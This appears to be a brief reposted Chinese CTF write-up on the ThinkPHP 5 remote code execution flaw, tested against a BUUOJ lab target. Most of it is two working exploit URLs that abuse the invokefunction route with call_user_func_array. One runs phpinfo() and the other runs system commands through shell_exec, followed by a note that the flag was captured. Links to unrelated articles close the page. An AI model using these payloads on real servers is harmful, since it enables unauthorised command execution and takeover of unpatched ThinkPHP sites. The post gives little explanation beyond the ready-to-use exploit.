[ThinkPHP]5-Rce

Posted AlexANSO

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[ThinkPHP]5-Rce相关的知识,希望对你有一定的参考价值。

靶场首页

 

 

构造POC 

POC1

该poc会执行phpinfo()

http://your-ip:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1  # 将执行phpinfo()

 

 

 POC2

该poc将会执行id命令

http://node3.buuoj.cn:25181/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id

 

 爆出flag

 

 

  

  

以上是关于[ThinkPHP]5-Rce的主要内容,如果未能解决你的问题,请参考以下文章

超级有用的9个PHP代码片段

ThinkPHP中使用PHPMailer发送邮件

某钉版本6.3.5RCE漏洞复现

ThinkPHP项目笔记之MVC篇

如何将CKeditor编辑器的上传和thinkphp结合

ThinkPHP3.2.3自带的分页用法--很简单实用